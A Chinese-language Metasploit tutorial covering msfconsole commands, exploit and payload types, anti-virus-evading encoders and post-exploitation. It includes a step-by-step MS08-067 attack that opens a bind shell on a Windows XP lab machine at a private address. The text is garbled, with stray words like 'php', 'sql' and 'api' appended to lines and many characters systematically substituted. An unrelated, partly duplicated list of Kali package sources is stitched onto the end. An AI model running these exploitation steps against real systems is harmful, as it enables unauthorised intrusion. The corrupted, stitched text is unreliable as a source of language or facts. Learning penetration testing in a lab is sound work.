Msfconsole提供了一个一体化的集中控制台。经过msfconsole,你能够访问和使用全部的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,好比nmap,sqlmap等,能够直接在msfconsole里面使用。 在启动MSF终端以后,能够首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。对于其中的大部分命令,你能够输入help[COMMAND],进一步查看该命令的使用帮助信息。php
1.输入 msfconsole 打开linux
2.而后输入 search ms08-067查找漏洞
打开远程桌面协议sql
use参数
这个是使用参数。如你要使用到某个利用模块,payload等,那么就要使用到use参数
使用漏洞 use 你选择的利用模块shell
Show参数
这个命令用的不少。请必定认真看。若是单纯的输入show,那么就会显示出全部的payload,利用模块,post模块,插件等等。可是通常咱们都不这么使用。若是要显示利用模块,那么就输入show exploits。若是要显示payload,那么就输入show payloads。
展现可用载荷show payloads数据库
查看还须要设置的选项 show options,为YES且空的就是还须要咱们设置的。 能够看到下图中RHOST参数还未设置内容 windows
Set参数
这个主要是对payload或者其余模块进行设置。好比设置攻击目标的IP就是set RHOST 192.168.0.2后端
而后输入 exploit 执行攻击,输入exit退出api
测试者利用它来攻击一个系统,程序,或服务,以得到开发者意料以外的结果。常见的有内存溢出,网站程序漏洞利用,配置错误exploit。
exploits总的来讲共分为两类溢出(exploit)攻击方法,即主动溢出和被动溢出。主动溢出是针对目标主机的漏洞主动的进行攻击以得到控制权限,被动溢出是针 对目标主机被动的监听而后得到相应的操做。
Exploit共分为13种,分别是:ais、bsdi、dialup、freebsd、hpux、irix、linux、multi、netware、osx、solaris、unix、windows。其中windows下面的最多。
在metasploit中内置了27种encode模块,可对metasploit中的exploit进行编码(encode),以免反病毒软件检测。如:
generic/none normal The "none" Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 encoder
ppc/longxor normal PPC LongXOR Encoder
咱们想让被攻击系统执行的程序,如reverse shell 能够从目标机器与测试者之间创建一
个反响链接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也能够是只
能在目标机器上执行有限命令的程序。
在渗透攻击取得目标系统远程控制权以后,在受控系统中进行各式各样的后渗透攻击动做,好比获取敏感信息、进一步拓展、实施跳板攻击等。
使用msfconsole,了解msfcli,msfguitcp
Metasploit目前提供了三种用户使用接口,一个是GUI模式,另外一个是console终端模式,第三种是CLI(命令行)模式。msfcli 虽然和msfconsole同样同为命令行界面,工具
可是他不提供交互的命令行模式,直接经过命令行执行输出结果,直接调用辅助模块和攻击模块对目标进行渗透攻击,更为高效便捷。msfgui 图形化界面工具可
轻松地单击鼠标,输入目标 IP 地址,就可使用 Metasploit 强大功能渗透进入目标系统 。
输入msfconsole
运行此命令后将进入msf 命令提示符:
msf>
二、获取命令的帮助信息:help
例子:help connect
三、Armitage :MSF 的一个图形接口
运行方式:armitage
经常使用exploit,payload设置参数
攻击靶机并获取shell
被攻击者IP地址:192.168.120.131,操做系统Windows XP sp3
攻击者IP地址:192.168.120.130
1.//查找ms08_067漏洞
msf > search ms08_067
二、//使用MS08_067漏洞
use exploit/windows/smb/ms08_067_netapi
三、//设置远程地址,正向链接
set RHOST 192.168.120.131
四、//设置ShellCode
set payload windows/shell_bind_tcp
五、//显示配置的选项
show options
六、//expliot攻击
成功返回Shell
源:
deb http://mirrors.ustc.edu.cn/kali sana main non-free contrib
deb http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free
deb-src http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free
#阿里云kali源
deb http://mirrors.aliyun.com/kali sana main non-free contrib
deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb cdrom:[Debian GNU/Linux 2.0 _Sana_ - Official Snapshot i386 LIVE/INSTALL Binary 20150811-09:06]/ sana contrib main non-free
deb cdrom:[Debian GNU/Linux 2.0 _Sana_ - Official Snapshot i386 LIVE/INSTALL Binary 20150811-09:06]/ sana contrib main non-free
deb http://http.kali.org/kali sana main non-free contrib
deb-src http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
deb-src http://security.kali.org/kali-security/ sana/updates main contrib non-free
deb http://http.kali.org/kali kali main non-free contrib
deb-src http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb http://mirrors.aliyun.com/kali kali main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali main non-free contrib
deb http://mirrors.aliyun.com/kali kali main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali main non-free contrib
deb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free
deb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free